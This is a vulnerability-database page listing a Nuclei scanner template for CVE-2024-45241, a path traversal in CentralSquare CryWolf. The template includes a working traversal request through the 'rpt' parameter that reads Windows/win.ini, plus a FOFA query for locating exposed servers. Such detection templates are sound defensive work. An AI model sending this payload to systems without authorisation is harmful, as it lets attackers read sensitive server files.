Lucene search
K

CentralSquare CryWolf - Path Traversal

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 34 Views

A traversal vulnerability in CryWolf (False Alarm Management) allows unauthenticated attackers to read files outside of the web directory via the rpt parameter, leading to the disclosure of sensitive info

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2024-45241
19 Sep 202412:43
githubexploit
Circl
CVE-2024-45241
26 Aug 202409:31
circl
CNNVD
CentralSquare CryWolf 安全漏洞
26 Aug 202400:00
cnnvd
CVE
CVE-2024-45241
26 Aug 202400:00
cve
Cvelist
CVE-2024-45241
26 Aug 202400:00
cvelist
NVD
CVE-2024-45241
26 Aug 202407:15
nvd
OpenVAS
Generic HTTP Directory Traversal / File Inclusion (Web Application URL Parameter) - Active Check
26 Sep 201700:00
openvas
Positive Technologies
PT-2024-31499 · Centralsquare · Centralsquare Crywolf
25 Aug 202400:00
ptsecurity
RedhatCVE
CVE-2024-45241
23 May 202508:06
redhatcve
Vulnrichment
CVE-2024-45241
26 Aug 202400:00
vulnrichment
Rows per page
id: CVE-2024-45241

info:
  name: CentralSquare CryWolf - Path Traversal
  author: s4e-io
  severity: high
  description: |
    A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information.
  impact: |
    Unauthenticated attackers can read arbitrary files from the server via path traversal, exposing sensitive information.
  remediation: |
    Update CentralSquare CryWolf to a version later than 2024-08-09 that patches the path traversal vulnerability.
  reference:
    - https://www.tenable.com/cve/CVE-2024-45241
    - https://daly.wtf/cve-2024-45241-path-traversal-in-centralsquare-crywolf/
    - https://github.com/d4lyw/CVE-2024-45241/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-45241
    epss-score: 0.13623
    epss-percentile: 0.96014
    cpe: cpe:2.3:a:centralsquare:crywolf:2024-08-09:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: centralsquare
    product: crywolf
    fofa-query: "False Alarm Reduction Website"
  tags: cve,cve2024,lfi,centralsquare,crywolf,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /GeneralDocs.aspx?rpt=../../../../Windows/win.ini HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"Powered by CryWolf")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /gdoc1.ashx HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"bit app support","fonts","extensions")'
          - 'contains(content_type,"application/pdf")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402203997c8b216f630c8ff48131e2a2d809c540a9c9d994f46b182ba1cd30023ea44022054c0bf72ec002f872d6b7fb37e86fe060efa58262a67b409f9d71fc93b901f1a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.5
EPSS0.13623
SSVC
34